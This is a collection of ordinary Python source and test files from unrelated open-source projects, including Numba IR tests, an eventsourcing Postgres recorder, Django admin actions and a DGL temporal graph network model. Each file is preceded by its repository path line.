def test_assign(self):
a = ir.Assign(self.var_a, self.var_b, self.loc1)
b = ir.Assign(self.var_a, self.var_b, self.loc1)
c = ir.Assign(self.var_a, self.var_b, self.loc2)
d = ir.Assign(self.var_c, self.var_b, self.loc1)
e = ir.Assign(self.var_a, self.var_c, self.loc1)
self.check(a, same=[b, c], different=[d, e])
def test_print(self):
a = ir.Print((self.var_a,), self.var_b, self.loc1)
b = ir.Print((self.var_a,), self.var_b, self.loc1)
c = ir.Print((self.var_a,), self.var_b, self.loc2)
d = ir.Print((self.var_c,), self.var_b, self.loc1)
e = ir.Print((self.var_a,), self.var_c, self.loc1)
self.check(a, same=[b, c], different=[d, e])
def test_storemap(self):
a = ir.StoreMap(self.var_a, self.var_b, self.var_c, self.loc1)
b = ir.StoreMap(self.var_a, self.var_b, self.var_c, self.loc1)
c = ir.StoreMap(self.var_a, self.var_b, self.var_c, self.loc2)
d = ir.StoreMap(self.var_d, self.var_b, self.var_c, self.loc1)
e = ir.StoreMap(self.var_a, self.var_d, self.var_c, self.loc1)
f = ir.StoreMap(self.var_a, self.var_b, self.var_d, self.loc1)
self.check(a, same=[b, c], different=[d, e, f])
def test_yield(self):
a = ir.Yield(self.var_a, self.loc1, 0)
b = ir.Yield(self.var_a, self.loc1, 0)
c = ir.Yield(self.var_a, self.loc2, 0)
d = ir.Yield(self.var_b, self.loc1, 0)
e = ir.Yield(self.var_a, self.loc1, 1)
self.check(a, same=[b, c], different=[d, e])
def test_enterwith(self):
a = ir.EnterWith(self.var_a, 0, 1, self.loc1)
b = ir.EnterWith(self.var_a, 0, 1, self.loc1)
c = ir.EnterWith(self.var_a, 0, 1, self.loc2)
d = ir.EnterWith(self.var_b, 0, 1, self.loc1)
e = ir.EnterWith(self.var_a, 1, 1, self.loc1)
f = ir.EnterWith(self.var_a, 0, 2, self.loc1)
self.check(a, same=[b, c], different=[d, e, f])
def test_arg(self):
a = ir.Arg('foo', 0, self.loc1)
b = ir.Arg('foo', 0, self.loc1)
c = ir.Arg('foo', 0, self.loc2)
d = ir.Arg('bar', 0, self.loc1)
e = ir.Arg('foo', 1, self.loc1)
self.check(a, same=[b, c], different=[d, e])
def test_const(self):
a = ir.Const(1, self.loc1)
b = ir.Const(1, self.loc1)
c = ir.Const(1, self.loc2)
d = ir.Const(2, self.loc1)
self.check(a, same=[b, c], different=[d])
def test_global(self):
a = ir.Global('foo', 0, self.loc1)
b = ir.Global('foo', 0, self.loc1)
c = ir.Global('foo', 0, self.loc2)
d = ir.Global('bar', 0, self.loc1)
e = ir.Global('foo', 1, self.loc1)
self.check(a, same=[b, c], different=[d, e])
def test_var(self):
a = ir.Var(None, 'foo', self.loc1)
b = ir.Var(None, 'foo', self.loc1)
c = ir.Var(None, 'foo', self.loc2)
d = ir.Var(ir.Scope(None, ir.unknown_loc), 'foo', self.loc1)
e = ir.Var(None, 'bar', self.loc1)
self.check(a, same=[b, c, d], different=[e])
def test_intrinsic(self):
a = ir.Intrinsic('foo', 'bar', (0,), self.loc1)
b = ir.Intrinsic('foo', 'bar', (0,), self.loc1)
c = ir.Intrinsic('foo', 'bar', (0,), self.loc2)
d = ir.Intrinsic('baz', 'bar', (0,), self.loc1)
e = ir.Intrinsic('foo', 'baz', (0,), self.loc1)
f = ir.Intrinsic('foo', 'bar', (1,), self.loc1)
self.check(a, same=[b, c], different=[d, e, f])
def test_undefinedtype(self):
a = ir.UndefinedType()
b = ir.UndefinedType()
self.check(a, same=[b])
def test_loop(self):
a = ir.Loop(1, 3)
b = ir.Loop(1, 3)
c = ir.Loop(2, 3)
d = ir.Loop(1, 4)
self.check(a, same=[b], different=[c, d])
def test_with(self):
a = ir.With(1, 3)
b = ir.With(1, 3)
c = ir.With(2, 3)
d = ir.With(1, 4)
self.check(a, same=[b], different=[c, d])
# used later
_GLOBAL = 1234
class TestIRCompounds(CheckEquality):
"""
Tests IR concepts that have state
"""
def test_varmap(self):
a = ir.VarMap()
a.define(self.var_a, 'foo')
a.define(self.var_b, 'bar')
b = ir.VarMap()
b.define(self.var_a, 'foo')
b.define(self.var_b, 'bar')
c = ir.VarMap()
c.define(self.var_a, 'foo')
c.define(self.var_c, 'bar')
self.check(a, same=[b], different=[c])
def test_block(self):
def gen_block():
parent = ir.Scope(None, self.loc1)
tmp = ir.Block(parent, self.loc2)
assign1 = ir.Assign(self.var_a, self.var_b, self.loc3)
assign2 = ir.Assign(self.var_a, self.var_c, self.loc3)
assign3 = ir.Assign(self.var_c, self.var_b, self.loc3)
tmp.append(assign1)
tmp.append(assign2)
tmp.append(assign3)
return tmp
a = gen_block()
b = gen_block()
c = gen_block().append(ir.Assign(self.var_a, self.var_b, self.loc3))
self.check(a, same=[b], different=[c])
def test_functionir(self):
# this creates a function full of all sorts of things to ensure the IR
# is pretty involved, it then compares two instances of the compiled
# function IR to check the IR is the same invariant of objects, and then
# a tiny mutation is made to the IR in the second function and detection
# of this change is checked.
def gen():
_FREEVAR = 0xCAFE
def foo(a, b, c=12, d=1j, e=None):
f = a + b
a += _FREEVAR
g = np.zeros(c, dtype=np.complex64)
h = f + g
i = 1j / d
if np.abs(i) > 0:
k = h / i
l = np.arange(1, c + 1)
with objmode():
print(e, k)
m = np.sqrt(l - g)
if np.abs(m[0]) < 1:
n = 0
for o in range(a):
n += 0
if np.abs(n) < 3:
break
n += m[2]
p = g / l
q = []
for r in range(len(p)):
q.append(p[r])
if r > 4 + 1:
with objmode(s='intp', t='complex128'):
s = 123
t = 5
if s > 122:
t += s
t += q[0] + _GLOBAL
return f + o + r + t + r + a + n
return foo
x = gen()
y = gen()
x_ir = compiler.run_frontend(x)
y_ir = compiler.run_frontend(y)
self.assertTrue(x_ir.equal_ir(y_ir))
def check_diffstr(string, pointing_at=[]):
lines = string.splitlines()
for item in pointing_at:
for l in lines:
if l.startswith('->'):
if item in l:
break
else:
raise AssertionError("Could not find %s " % item)
self.assertIn("IR is considered equivalent", x_ir.diff_str(y_ir))
# minor mutation, simply switch branch targets on last branch
for label in reversed(list(y_ir.blocks.keys())):
blk = y_ir.blocks[label]
if isinstance(blk.body[-1], ir.Branch):
ref = blk.body[-1]
ref.truebr, ref.falsebr = ref.falsebr, ref.truebr
break
check_diffstr(x_ir.diff_str(y_ir), ['branch'])
z = gen()
self.assertFalse(x_ir.equal_ir(y_ir))
z_ir = compiler.run_frontend(z)
change_set = set()
for label in reversed(list(z_ir.blocks.keys())):
blk = z_ir.blocks[label]
ref = blk.body[:-1]
idx = None
for i in range(len(ref)):
# look for two adjacent Del
if (isinstance(ref[i], ir.Del) and
isinstance(ref[i + 1], ir.Del)):
idx = i
break
if idx is not None:
b = blk.body
change_set.add(str(b[idx + 1]))
change_set.add(str(b[idx]))
b[idx], b[idx + 1] = b[idx + 1], b[idx]
break
self.assertFalse(x_ir.equal_ir(z_ir))
self.assertEqual(len(change_set), 2)
for item in change_set:
self.assertTrue(item.startswith('del '))
check_diffstr(x_ir.diff_str(z_ir), change_set)
def foo(a, b):
c = a * 2
d = c + b
e = np.sqrt(d)
return e
def bar(a, b): # same as foo
c = a * 2
d = c + b
e = np.sqrt(d)
return e
def baz(a, b):
c = a * 2
d = b + c
e = np.sqrt(d + 1)
return e
foo_ir = compiler.run_frontend(foo)
bar_ir = compiler.run_frontend(bar)
self.assertTrue(foo_ir.equal_ir(bar_ir))
self.assertIn("IR is considered equivalent", foo_ir.diff_str(bar_ir))
baz_ir = compiler.run_frontend(baz)
self.assertFalse(foo_ir.equal_ir(baz_ir))
tmp = foo_ir.diff_str(baz_ir)
self.assertIn("Other block contains more statements", tmp)
check_diffstr(tmp, ["c + b", "b + c"])
if __name__ == '__main__':
unittest.main()
|
tests/test_json_util.py | okutane/yandex-taxi-testsuite | 128 | 18785 | import dateutil
import pytest
from testsuite.plugins import mockserver
from testsuite.utils import json_util
NOW = dateutil.parser.parse('2019-09-19-13:04:00.000000')
MOCKSERVER_INFO = mockserver.MockserverInfo(
'localhost', 123, 'http://localhost:123/', None,
)
MOCKSERVER_SSL_INFO = mockserver.MockserverInfo(
'localhost',
456,
'https://localhost:456/',
mockserver.SslInfo('/some_dir/cert.cert', '/some_dir/cert.key'),
)
@pytest.mark.parametrize(
'json_input,expected_result',
[
( # simple list
[{'some_date': {'$dateDiff': 0}}, 'regular_element'], # json_input
[{'some_date': NOW}, 'regular_element'], # expected_result
),
( # simple dict
{ # json_input
'some_date': {'$dateDiff': 0},
'regular_key': 'regular_value',
},
{'some_date': NOW, 'regular_key': 'regular_value'}, # json_input
),
( # nested list and dict
{ # json_input
'regular_root_key': 'regular_root_value',
'root_date': {'$dateDiff': 0},
'parent_key': {
'nested_date': {'$dateDiff': 0},
'nested_list': [
'regular_element1',
{'$dateDiff': 0},
{'$dateDiff': 0},
'regular_element2',
],
},
},
{ # expected_result
'regular_root_key': 'regular_root_value',
'root_date': NOW,
'parent_key': {
'nested_date': NOW,
'nested_list': [
'regular_element1',
NOW,
NOW,
'regular_element2',
],
},
},
),
],
)
def test_substitute_now(json_input, expected_result):
result = json_util.substitute(json_input, now=NOW)
assert result == expected_result
@pytest.mark.parametrize(
'json_input,expected_result',
[
(
({'client_url': {'$mockserver': '/path'}}),
({'client_url': 'http://localhost:123/path'}),
),
(
({'client_url': {'$mockserver': '/path', '$schema': False}}),
({'client_url': 'localhost:123/path'}),
),
],
)
def test_substitute_mockserver(json_input, expected_result):
result = json_util.substitute(json_input, mockserver=MOCKSERVER_INFO)
assert result == expected_result
@pytest.mark.parametrize(
'json_input,expected_result',
[
(
({'client_url': {'$mockserver_https': '/path'}}),
({'client_url': 'https://localhost:456/path'}),
),
(
({'client_url': {'$mockserver_https': '/path', '$schema': False}}),
({'client_url': 'localhost:456/path'}),
),
],
)
def test_substitute_mockserver_https(json_input, expected_result):
result = json_util.substitute(
json_input, mockserver_https=MOCKSERVER_SSL_INFO,
)
assert result == expected_result
|
eventsourcing/examples/searchabletimestamps/postgres.py | ParikhKadam/eventsourcing | 107 | 18789 | <reponame>ParikhKadam/eventsourcing
from datetime import datetime
from typing import Any, List, Optional, Sequence, Tuple, cast
from uuid import UUID
from eventsourcing.domain import Aggregate
from eventsourcing.examples.searchabletimestamps.persistence import (
SearchableTimestampsRecorder,
)
from eventsourcing.persistence import ApplicationRecorder, StoredEvent
from eventsourcing.postgres import (
Factory,
PostgresApplicationRecorder,
PostgresConnection,
PostgresCursor,
PostgresDatastore,
)
class SearchableTimestampsApplicationRecorder(
SearchableTimestampsRecorder, PostgresApplicationRecorder
):
def __init__(
self,
datastore: PostgresDatastore,
events_table_name: str = "stored_events",
event_timestamps_table_name: str = "event_timestamps",
):
self.check_table_name_length(event_timestamps_table_name, datastore.schema)
self.event_timestamps_table_name = event_timestamps_table_name
super().__init__(datastore, events_table_name)
self.insert_event_timestamp_statement = (
f"INSERT INTO {self.event_timestamps_table_name} VALUES ($1, $2, $3)"
)
self.insert_event_timestamp_statement_name = (
f"insert_{event_timestamps_table_name}".replace(".", "_")
)
self.select_event_timestamp_statement = (
f"SELECT originator_version FROM {self.event_timestamps_table_name} WHERE "
f"originator_id = $1 AND "
f"timestamp <= $2 "
"ORDER BY originator_version DESC "
"LIMIT 1"
)
self.select_event_timestamp_statement_name = (
f"select_{event_timestamps_table_name}".replace(".", "_")
)
def construct_create_table_statements(self) -> List[str]:
statements = super().construct_create_table_statements()
statements.append(
"CREATE TABLE IF NOT EXISTS "
f"{self.event_timestamps_table_name} ("
"originator_id uuid NOT NULL, "
"timestamp timestamp with time zone, "
"originator_version bigint NOT NULL, "
"PRIMARY KEY "
"(originator_id, timestamp))"
)
return statements
def _prepare_insert_events(self, conn: PostgresConnection) -> None:
super()._prepare_insert_events(conn)
self._prepare(
conn,
self.insert_event_timestamp_statement_name,
self.insert_event_timestamp_statement,
)
def _insert_events(
self,
c: PostgresCursor,
stored_events: List[StoredEvent],
**kwargs: Any,
) -> Optional[Sequence[int]]:
notification_ids = super()._insert_events(c, stored_events, **kwargs)
# Insert event timestamps.
event_timestamps_data = cast(
List[Tuple[UUID, datetime, int]], kwargs.get("event_timestamps_data")
)
for event_timestamp_data in event_timestamps_data:
statement_alias = self.statement_name_aliases[
self.insert_event_timestamp_statement_name
]
c.execute(f"EXECUTE {statement_alias}(%s, %s, %s)", event_timestamp_data)
return notification_ids
def get_version_at_timestamp(
self, originator_id: UUID, timestamp: datetime
) -> Optional[int]:
with self.datastore.get_connection() as conn:
self._prepare(
conn,
self.select_event_timestamp_statement_name,
self.select_event_timestamp_statement,
)
with conn.transaction(commit=False) as curs:
statement_alias = self.statement_name_aliases[
self.select_event_timestamp_statement_name
]
curs.execute(
f"EXECUTE {statement_alias}(%s, %s)", [originator_id, timestamp]
)
for row in curs.fetchall():
return row["originator_version"]
else:
return Aggregate.INITIAL_VERSION - 1
class SearchableTimestampsInfrastructureFactory(Factory):
def application_recorder(self) -> ApplicationRecorder:
prefix = (self.datastore.schema + ".") if self.datastore.schema else ""
prefix += self.env.name.lower() or "stored"
events_table_name = prefix + "_events"
event_timestamps_table_name = prefix + "_timestamps"
recorder = SearchableTimestampsApplicationRecorder(
datastore=self.datastore,
events_table_name=events_table_name,
event_timestamps_table_name=event_timestamps_table_name,
)
recorder.create_table()
return recorder
del Factory
|
app/blogging/routes.py | Sjors/patron | 114 | 18819 | from app.blogging import bp
from datetime import datetime
from flask import flash, redirect, url_for
from flask_login import current_user
@bp.before_request
def protect():
'''
Registers new function to Flask-Blogging Blueprint that protects
updates to make them only viewable by paid subscribers.
'''
if current_user.is_authenticated:
if datetime.today() <= current_user.expiration:
return None
else:
flash('You must have a paid-up subscription \
to view updates.', 'warning')
return redirect(url_for('main.support'))
else:
flash('Please login to view updates.', 'warning')
return redirect(url_for('auth.login'))
|
WebMirror/management/rss_parser_funcs/feed_parse_extractKaedesan721TumblrCom.py | fake-name/ReadableWebProxy | 193 | 18837 | <gh_stars>100-1000
def extractKaedesan721TumblrCom(item):
'''
Parser for 'kaedesan721.tumblr.com'
'''
bad_tags = [
'FanArt',
"htr asks",
'Spanish translations',
'htr anime','my thoughts',
'Cats',
'answered',
'ask meme',
'relay convos',
'translation related post',
'nightmare fuel',
'htr manga',
'memes',
'htrweek',
'Video Games',
'Animation',
'replies',
'jazz',
'Music',
]
if any([bad in item['tags'] for bad in bad_tags]):
return None
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol) or "preview" in item['title'].lower():
return None
if "my translations" in item['tags']:
tagmap = [
('<NAME>', '<NAME>', 'translated'),
('<NAME>', '<NAME>', 'translated'),
('PRC', 'PRC', 'translated'),
('Loiterous', 'Loiterous', 'oel'),
]
for tagname, name, tl_type in tagmap:
if tagname in item['tags']:
return buildReleaseMessageWithType(item, name, vol, chp, frag=frag, postfix=postfix, tl_type=tl_type)
return False |
Scripts/sims4communitylib/classes/time/common_alarm_handle.py | ColonolNutty/Sims4CommunityLibrary | 118 | 18893 | """
The Sims 4 Community Library is licensed under the Creative Commons Attribution 4.0 International public license (CC BY 4.0).
https://creativecommons.org/licenses/by/4.0/
https://creativecommons.org/licenses/by/4.0/legalcode
Copyright (c) COLONOLNUTTY
"""
import os
from sims4.commands import Command, CommandType, CheatOutput
from sims4communitylib.utils.common_time_utils import CommonTimeUtils
from typing import Any, Callable
ON_RTD = os.environ.get('READTHEDOCS', None) == 'True'
if not ON_RTD:
from scheduling import Timeline
from alarms import AlarmHandle
from date_and_time import DateAndTime, TimeSpan
else:
# noinspection PyMissingOrEmptyDocstring
class AlarmHandle:
def cancel(self):
pass
# noinspection PyMissingOrEmptyDocstring
class DateAndTime:
pass
# noinspection PyMissingOrEmptyDocstring
class TimeSpan:
pass
# noinspection PyMissingOrEmptyDocstring
class Timeline:
pass
class CommonAlarmHandle(AlarmHandle):
"""A custom alarm handle that keeps track of when it is slated to trigger for the first time."""
def __init__(
self,
owner: Any,
on_alarm_triggered_callback: Callable[['CommonAlarmHandle'], None],
timeline: Timeline,
when: DateAndTime,
should_repeat: bool=False,
time_until_repeat: TimeSpan=None,
accurate_repeat: bool=True,
persist_across_zone_loads: bool=False
):
self.started_at_date_and_time = when
super().__init__(
owner,
on_alarm_triggered_callback,
timeline,
when,
repeating=should_repeat,
repeat_interval=time_until_repeat,
accurate_repeat=accurate_repeat,
cross_zone=persist_across_zone_loads
)
if not ON_RTD:
@Command('s4clib.print_current_time', command_type=CommandType.Live)
def _s4clib_print_current_time(_connection: int=None):
output = CheatOutput(_connection)
output('Current time')
output('Hour {} Minute {}'.format(CommonTimeUtils.get_current_date_and_time().hour(), CommonTimeUtils.get_current_date_and_time().minute()))
output('Abs Hour {} Abs Minute {}'.format(CommonTimeUtils.get_current_date_and_time().absolute_hours(), CommonTimeUtils.get_current_date_and_time().absolute_minutes()))
|
examples/make_sphere_graphic.py | itamar-dw/spherecluster | 186 | 18907 | import sys
import numpy as np
from matplotlib import pyplot as plt
from mpl_toolkits.mplot3d import Axes3D # NOQA
import seaborn # NOQA
from spherecluster import sample_vMF
plt.ion()
n_clusters = 3
mus = np.random.randn(3, n_clusters)
mus, r = np.linalg.qr(mus, mode='reduced')
kappas = [15, 15, 15]
num_points_per_class = 250
Xs = []
for nn in range(n_clusters):
new_X = sample_vMF(mus[nn], kappas[nn], num_points_per_class)
Xs.append(new_X.T)
fig = plt.figure(figsize=(8, 6))
ax = fig.add_subplot(
1, 1, 1, aspect='equal', projection='3d',
adjustable='box-forced', xlim=[-1.1, 1.1], ylim=[-1.1, 1.1],
zlim=[-1.1, 1.1]
)
colors = ['b', 'r', 'g']
for nn in range(n_clusters):
ax.scatter(Xs[nn][0, :], Xs[nn][1, :], Xs[nn][2, :], c=colors[nn])
ax.set_aspect('equal')
plt.axis('off')
plt.show()
def r_input(val=None):
val = val or ''
if sys.version_info[0] >= 3:
return eval(input(val))
return raw_input(val)
r_input()
|
python2/examples/tutorial_threadednotifier.py | openEuler-BaseService/pyinotify | 1,509 | 18922 | # ThreadedNotifier example from tutorial
#
# See: http://github.com/seb-m/pyinotify/wiki/Tutorial
#
import pyinotify
wm = pyinotify.WatchManager() # Watch Manager
mask = pyinotify.IN_DELETE | pyinotify.IN_CREATE # watched events
class EventHandler(pyinotify.ProcessEvent):
def process_IN_CREATE(self, event):
print "Creating:", event.pathname
def process_IN_DELETE(self, event):
print "Removing:", event.pathname
#log.setLevel(10)
notifier = pyinotify.ThreadedNotifier(wm, EventHandler())
notifier.start()
wdd = wm.add_watch('/tmp', mask, rec=True)
wm.rm_watch(wdd.values())
notifier.stop()
|
PyInstaller/hooks/hook-numpy.py | mathiascode/pyinstaller | 9,267 | 18942 | <reponame>mathiascode/pyinstaller
#!/usr/bin/env python3
# --- Copyright Disclaimer ---
#
# In order to support PyInstaller with numpy<1.20.0 this file will be duplicated for a short period inside
# PyInstaller's repository [1]. However this file is the intellectual property of the NumPy team and is
# under the terms and conditions outlined their repository [2].
#
# .. refs:
#
# [1] PyInstaller: https://github.com/pyinstaller/pyinstaller/
# [2] NumPy's license: https://github.com/numpy/numpy/blob/master/LICENSE.txt
#
"""
This hook should collect all binary files and any hidden modules that numpy needs.
Our (some-what inadequate) docs for writing PyInstaller hooks are kept here:
https://pyinstaller.readthedocs.io/en/stable/hooks.html
PyInstaller has a lot of NumPy users so we consider maintaining this hook a high priority.
Feel free to @mention either bwoodsend or Legorooj on Github for help keeping it working.
"""
from PyInstaller.compat import is_conda, is_pure_conda
from PyInstaller.utils.hooks import collect_dynamic_libs
# Collect all DLLs inside numpy's installation folder, dump them into built app's root.
binaries = collect_dynamic_libs("numpy", ".")
# If using Conda without any non-conda virtual environment manager:
if is_pure_conda:
# Assume running the NumPy from Conda-forge and collect it's DLLs from the communal Conda bin directory. DLLs from
# NumPy's dependencies must also be collected to capture MKL, OpenBlas, OpenMP, etc.
from PyInstaller.utils.hooks import conda_support
datas = conda_support.collect_dynamic_libs("numpy", dependencies=True)
# Submodules PyInstaller cannot detect (probably because they are only imported by extension modules, which PyInstaller
# cannot read).
hiddenimports = ['numpy.core._dtype_ctypes']
if is_conda:
hiddenimports.append("six")
# Remove testing and building code and packages that are referenced throughout NumPy but are not really dependencies.
excludedimports = [
"scipy",
"pytest",
"nose",
"distutils",
"f2py",
"setuptools",
"numpy.f2py",
"numpy.distutils",
]
|
test_proj/blog/admin.py | Ivan-Feofanov/django-inline-actions | 204 | 18943 | from django.contrib import admin, messages
from django.shortcuts import render
from django.utils.translation import gettext_lazy as _
from inline_actions.actions import DefaultActionsMixin, ViewAction
from inline_actions.admin import InlineActionsMixin, InlineActionsModelAdminMixin
from . import forms
from .models import Article, Author, AuthorProxy
class UnPublishActionsMixin(object):
def get_inline_actions(self, request, obj=None):
actions = super(UnPublishActionsMixin, self).get_inline_actions(request, obj)
if obj:
if obj.status == Article.DRAFT:
actions.append('publish')
elif obj.status == Article.PUBLISHED:
actions.append('unpublish')
return actions
def publish(self, request, obj, parent_obj=None):
obj.status = Article.PUBLISHED
obj.save()
messages.info(request, _("Article published."))
publish.short_description = _("Publish") # type: ignore
def unpublish(self, request, obj, parent_obj=None):
obj.status = Article.DRAFT
obj.save()
messages.info(request, _("Article unpublished."))
unpublish.short_description = _("Unpublish") # type: ignore
class TogglePublishActionsMixin(object):
def get_inline_actions(self, request, obj=None):
actions = super(TogglePublishActionsMixin, self).get_inline_actions(
request=request, obj=obj
)
actions.append('toggle_publish')
return actions
def toggle_publish(self, request, obj, parent_obj=None):
if obj.status == Article.DRAFT:
obj.status = Article.PUBLISHED
else:
obj.status = Article.DRAFT
obj.save()
status = 'unpublished' if obj.status == Article.DRAFT else 'published'
messages.info(request, _("Article {}.".format(status)))
def get_toggle_publish_label(self, obj):
label = 'publish' if obj.status == Article.DRAFT else 'unpublish'
return 'Toggle {}'.format(label)
def get_toggle_publish_css(self, obj):
return 'button object-tools' if obj.status == Article.DRAFT else 'default'
class ChangeTitleActionsMixin(object):
def get_inline_actions(self, request, obj=None):
actions = super(ChangeTitleActionsMixin, self).get_inline_actions(request, obj)
actions.append('change_title')
return actions
def change_title(self, request, obj, parent_obj=None):
# explictly check whether the submit button has been pressed
if '_save' in request.POST:
form = forms.ChangeTitleForm(request.POST, instance=obj)
form.save()
return None # return back to list view
elif '_back' in request.POST:
return None # return back to list view
else:
form = forms.ChangeTitleForm(instance=obj)
return render(request, 'change_title.html', context={'form': form})
class ArticleInline(
DefaultActionsMixin,
UnPublishActionsMixin,
TogglePublishActionsMixin,
InlineActionsMixin,
admin.TabularInline,
):
model = Article
fields = (
'title',
'status',
)
readonly_fields = (
'title',
'status',
)
def has_add_permission(self, request, obj=None):
return False
class ArticleNoopInline(InlineActionsMixin, admin.TabularInline):
model = Article
fields = (
'title',
'status',
)
readonly_fields = (
'title',
'status',
)
def get_inline_actions(self, request, obj=None):
actions = super(ArticleNoopInline, self).get_inline_actions(
request=request, obj=obj
)
actions.append('noop_action')
return actions
def noop_action(self, request, obj, parent_obj=None):
pass
@admin.register(AuthorProxy)
class AuthorMultipleInlinesAdmin(InlineActionsModelAdminMixin, admin.ModelAdmin):
inlines = [ArticleInline, ArticleNoopInline]
list_display = ('name',)
inline_actions = None
@admin.register(Author)
class AuthorAdmin(InlineActionsModelAdminMixin, admin.ModelAdmin):
inlines = [ArticleInline]
list_display = ('name',)
inline_actions = None
@admin.register(Article)
class ArticleAdmin(
UnPublishActionsMixin,
TogglePublishActionsMixin,
ChangeTitleActionsMixin,
ViewAction,
InlineActionsModelAdminMixin,
admin.ModelAdmin,
):
list_display = ('title', 'status', 'author')
|
social/actions.py | raccoongang/python-social-auth | 1,987 | 18956 | from social_core.actions import do_auth, do_complete, do_disconnect
|
opennmt/tests/text_test.py | gcervantes8/OpenNMT-tf | 1,363 | 18971 | <reponame>gcervantes8/OpenNMT-tf<gh_stars>1000+
import tensorflow as tf
from parameterized import parameterized
from opennmt.data import text
class TextTest(tf.test.TestCase):
def _testTokensToChars(self, tokens, expected_chars):
expected_chars = tf.nest.map_structure(tf.compat.as_bytes, expected_chars)
chars = text.tokens_to_chars(tf.constant(tokens, dtype=tf.string))
self.assertListEqual(chars.to_list(), expected_chars)
def testTokensToCharsEmpty(self):
self._testTokensToChars([], [])
def testTokensToCharsSingle(self):
self._testTokensToChars(["Hello"], [["H", "e", "l", "l", "o"]])
def testTokensToCharsMixed(self):
self._testTokensToChars(
["Just", "a", "测试"], [["J", "u", "s", "t"], ["a"], ["测", "试"]]
)
@parameterized.expand(
[
[["a■", "b", "c■", "d", "■e"], [["a■", "b"], ["c■", "d", "■e"]]],
[
["a", "■", "b", "c■", "d", "■", "e"],
[["a", "■", "b"], ["c■", "d", "■", "e"]],
],
]
)
def testToWordsWithJoiner(self, tokens, expected):
expected = tf.nest.map_structure(tf.compat.as_bytes, expected)
tokens = tf.constant(tokens)
words = text.tokens_to_words(tokens)
self.assertAllEqual(words.to_list(), expected)
@parameterized.expand(
[
[["▁a", "b", "▁c", "d", "e"], [["▁a", "b"], ["▁c", "d", "e"]]],
[
["▁", "a", "b", "▁", "c", "d", "e"],
[["▁", "a", "b"], ["▁", "c", "d", "e"]],
],
[["a▁", "b", "c▁", "d", "e"], [["a▁"], ["b", "c▁"], ["d", "e"]]],
[
["a", "▁b▁", "c", "d", "▁", "e"],
[["a"], ["▁b▁"], ["c", "d"], ["▁", "e"]],
],
]
)
def testToWordsWithSpacer(self, tokens, expected):
expected = tf.nest.map_structure(tf.compat.as_bytes, expected)
tokens = tf.constant(tokens)
words = text.tokens_to_words(tokens, subword_token="▁", is_spacer=True)
self.assertAllEqual(words.to_list(), expected)
def _testPharaohAlignments(self, line, lengths, expected_matrix):
matrix = text.alignment_matrix_from_pharaoh(
tf.constant(line), lengths[0], lengths[1], dtype=tf.int32
)
self.assertListEqual(expected_matrix, self.evaluate(matrix).tolist())
def testPharaohAlignments(self):
self._testPharaohAlignments("", [0, 0], [])
self._testPharaohAlignments("0-0", [1, 1], [[1]])
self._testPharaohAlignments(
"0-0 1-1 2-2 3-3",
[4, 4],
[[1, 0, 0, 0], [0, 1, 0, 0], [0, 0, 1, 0], [0, 0, 0, 1]],
)
self._testPharaohAlignments(
"0-0 1-1 2-3 3-2",
[4, 4],
[[1, 0, 0, 0], [0, 1, 0, 0], [0, 0, 0, 1], [0, 0, 1, 0]],
)
self._testPharaohAlignments("0-0 1-2 1-1", [2, 3], [[1, 0], [0, 1], [0, 1]])
self._testPharaohAlignments(
"0-0 1-2 1-1 2-4",
[3, 5],
[[1, 0, 0], [0, 1, 0], [0, 1, 0], [0, 0, 0], [0, 0, 1]],
)
@parameterized.expand([[True], [False]])
def testInvalidPharaohAlignments(self, run_as_function):
func = text.alignment_matrix_from_pharaoh
if run_as_function:
func = tf.function(func)
with self.assertRaisesRegex(tf.errors.InvalidArgumentError, "source"):
func(tf.constant("0-0 1-1 2-3 3-2"), 2, 4)
with self.assertRaisesRegex(tf.errors.InvalidArgumentError, "target"):
func(tf.constant("0-0 1-2 1-1 2-4"), 3, 4)
if __name__ == "__main__":
tf.test.main()
|
examples/pytorch/tgn/tgn.py | ketyi/dgl | 9,516 | 18978 | <gh_stars>1000+
import copy
import torch.nn as nn
import dgl
from modules import MemoryModule, MemoryOperation, MsgLinkPredictor, TemporalTransformerConv, TimeEncode
class TGN(nn.Module):
def __init__(self,
edge_feat_dim,
memory_dim,
temporal_dim,
embedding_dim,
num_heads,
num_nodes,
n_neighbors=10,
memory_updater_type='gru',
layers=1):
super(TGN, self).__init__()
self.memory_dim = memory_dim
self.edge_feat_dim = edge_feat_dim
self.temporal_dim = temporal_dim
self.embedding_dim = embedding_dim
self.num_heads = num_heads
self.n_neighbors = n_neighbors
self.memory_updater_type = memory_updater_type
self.num_nodes = num_nodes
self.layers = layers
self.temporal_encoder = TimeEncode(self.temporal_dim)
self.memory = MemoryModule(self.num_nodes,
self.memory_dim)
self.memory_ops = MemoryOperation(self.memory_updater_type,
self.memory,
self.edge_feat_dim,
self.temporal_encoder)
self.embedding_attn = TemporalTransformerConv(self.edge_feat_dim,
self.memory_dim,
self.temporal_encoder,
self.embedding_dim,
self.num_heads,
layers=self.layers,
allow_zero_in_degree=True)
self.msg_linkpredictor = MsgLinkPredictor(embedding_dim)
def embed(self, postive_graph, negative_graph, blocks):
emb_graph = blocks[0]
emb_memory = self.memory.memory[emb_graph.ndata[dgl.NID], :]
emb_t = emb_graph.ndata['timestamp']
embedding = self.embedding_attn(emb_graph, emb_memory, emb_t)
emb2pred = dict(
zip(emb_graph.ndata[dgl.NID].tolist(), emb_graph.nodes().tolist()))
# Since postive graph and negative graph has same is mapping
feat_id = [emb2pred[int(n)] for n in postive_graph.ndata[dgl.NID]]
feat = embedding[feat_id]
pred_pos, pred_neg = self.msg_linkpredictor(
feat, postive_graph, negative_graph)
return pred_pos, pred_neg
def update_memory(self, subg):
new_g = self.memory_ops(subg)
self.memory.set_memory(new_g.ndata[dgl.NID], new_g.ndata['memory'])
self.memory.set_last_update_t(
new_g.ndata[dgl.NID], new_g.ndata['timestamp'])
# Some memory operation wrappers
def detach_memory(self):
self.memory.detach_memory()
def reset_memory(self):
self.memory.reset_memory()
def store_memory(self):
memory_checkpoint = {}
memory_checkpoint['memory'] = copy.deepcopy(self.memory.memory)
memory_checkpoint['last_t'] = copy.deepcopy(self.memory.last_update_t)
return memory_checkpoint
def restore_memory(self, memory_checkpoint):
self.memory.memory = memory_checkpoint['memory']
self.memory.last_update_time = memory_checkpoint['last_t']
|
f5/bigip/tm/asm/policies/test/functional/test_signatures.py | nghia-tran/f5-common-python | 272 | 19011 | <reponame>nghia-tran/f5-common-python
# Copyright 2017 F5 Networks Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
